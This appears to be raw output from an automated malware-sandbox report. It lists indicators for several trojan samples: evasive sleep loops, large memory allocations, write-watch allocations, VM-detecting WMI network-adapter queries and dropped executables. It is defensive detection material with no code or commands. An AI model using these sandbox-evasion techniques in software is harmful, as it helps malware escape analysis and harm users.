Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Allocates many large memory junks
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DA0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DA1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DCD000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DCE000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2E24000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F1C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F1E000 memory commit 500015104
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DB0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DB1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DDD000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DDE000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2E34000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F2C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F2E000 memory commit 500015104
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2E60000 memory commit 500006912 Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2E61000 memory commit 500178944 Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2E8D000 memory commit 500002816 Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2E8E000 memory commit 500350976 Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2EE4000 memory commit 501014528 Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2FDC000 memory commit 500006912 Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: 2FDE000 memory commit 500015104 Jump to behavior
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 9E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2660000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: BF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 28B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2AD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 28D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 3180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 5180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: FC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2980000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 4980000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2890000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 26A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: CC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2860000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 26D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2250000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 23D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 43D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 1730000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 3050000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 5050000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 4550000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 7009 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 2775 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7682
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1876
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 2993
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 6796
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 6545
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 3171
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 3732
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 6074
Found dropped PE file which has not been started or loaded
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe Dropped PE file which has not been started: C:\Users\Public\xpha.pif Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -34126476536362649s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -200000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99824s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 4072 Thread sleep count: 7009 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99708s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99589s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99478s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 4072 Thread sleep count: 2775 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99320s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99166s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98927s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98725s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98603s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98483s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98368s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98260s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98117s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97989s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97846s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97719s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97609s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97496s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97382s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97274s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97160s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -97035s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96912s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96772s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96646s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96522s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96281s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -96059s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95943s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95818s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95693s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95568s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95443s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95318s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95193s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -95055s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94941s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94818s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94696s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94582s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94459s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94334s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94209s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -94084s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -93960s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -93844s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99725s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99616s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99505s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99382s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99261s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99148s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -99039s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98907s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160 Thread sleep time: -98803s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6468 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676 Thread sleep count: 7682 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 892 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6484 Thread sleep count: 1876 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3032 Thread sleep time: -179580000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3032 Thread sleep time: -407760000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5292 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6664 Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99349s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99157s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98999s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98869s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98758s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98649s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98377s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98238s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97963s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97713s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97479s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97335s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96552s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96152s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96008s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95868s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95747s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95592s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95416s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95272s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95135s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -94898s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -94777s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -94635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -94473s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -94153s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99790s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99417s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99183s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -99076s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98962s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98850s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98723s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98333s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98182s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -98071s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97964s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97854s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97743s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97524s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97417s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97307s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97197s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -97087s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96979s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96869s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96759s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96650s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96540s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96432s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96323s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96213s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -96103s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95994s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95881s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95761s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95519s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432 Thread sleep time: -95386s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4040 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -39660499758475511s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5600 Thread sleep count: 3732 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -99886s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -99771s >= -30000s
